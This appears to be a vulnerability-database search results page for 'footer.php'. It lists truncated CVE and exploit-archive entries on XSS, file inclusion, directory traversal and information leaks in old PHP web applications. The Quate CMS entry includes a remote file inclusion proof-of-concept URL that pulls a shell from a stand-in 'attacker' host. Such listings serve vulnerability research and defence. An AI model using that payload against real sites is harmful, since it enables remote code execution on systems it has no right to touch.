47 matches found
EUVD-2007-2231
Malware in sbrugna...
EUVD-2005-3236
Malware in sbrugna...
EUVD-2006-4872
Malware in sbrugna...
Design/Logic Flaw
phpMyAdmin before 4.9.2 does not escape certain Git information, related to libraries/classes/Display/GitRevision.php and libraries/classes/Footer.php...
CVE-2019-19617
CVE-2019-19617 affects phpMyAdmin prior to 4.9.2. The issue is that phpMyAdmin does not escape certain Git information in GitRevision.php and Footer.php, per multiple advisories. Connected documents confirm affected product/version ranges and link to fix/release notes. The Debian entry notes the ...
ShopBuilder 5.6.1 /footer.php Local File Inclusion Vulnerability
No description provided by source...
FlatNuke 2.5.5 footer.php Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities t...
phpbms 0.96 Multiple Vulnerabilities
No description provided by source. phpBMS v0.96 phpbms.org eLwauxc2009, uasc.org.ua http://phpbms.org/trial/ SQL Inj ...
phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
No description provided by source. Author: [email protected] mozi phpGreetz Remote File Inclusion Vulnerability Greetz: Raver phpfreaks eu.undernet.org Greetz: SpiderZ , fUSiON Download:...
Phorum 3.3.2 Cross Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/4767/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. The 'header.php' and 'footer.php' components of Phorum do not sanitize the client-supplied...
Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities
No description provided by source. bif3-0.4.1 = Remote File Include Vulnerability D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com ...
Information disclosure
dotproject 2.1.4 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by style/dp-grey-theme/footer.php and certain other files...
Directory traversal
Multiple directory traversal vulnerabilities in Geekhelps ADMP 1.01, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the style parameter to (1) colorvoid/footer.php, (2) default-green/footer.php, (3)...
Quate CMS 0.3.5 - Local/Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...
CVE-2009-2853
WordPress before 2.8.3 allows remote attackers to gain privileges via a direct request to (1) admin-footer.php, (2) edit-category-form.php, (3) edit-form-advanced.php, (4) edit-form-comment.php, (5) edit-link-category-form.php, (6) edit-link-form.php, (7) edit-page-form.php, and (8) edit-tag-form.php in wp-admin...
phpbms 0.96 - Multiple Vulnerabilities
phpBMS v0.96 phpbms.org eLwauxc2009, uasc.org.ua http://phpbms.org/trial/ SQL Inj $querystatement="SELECT...
Remote file inclusion
PHP remote file inclusion vulnerability in footer.php in PHP-Crawler 0.8 allows remote attackers to execute arbitrary PHP code via a URL in the footerfile parameter...
CVE-2008-4137
PHP remote file inclusion vulnerability in footer.php in PHP-Crawler 0.8 allows remote attackers to execute arbitrary PHP code via a URL in the footerfile parameter...
Design/Logic Flaw
BilboBlog 0.2.1 allows remote attackers to obtain sensitive information via (1) an enablecache=false query string to footer.php or (2) a direct request to pagination.php, which reveals the installation path in an error message...
CVE-2008-2206
Multiple cross-site scripting (XSS) vulnerabilities in Maian Music 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter in a search action to index.php, and the (2) msgscript parameter to admin/inc/footer.php...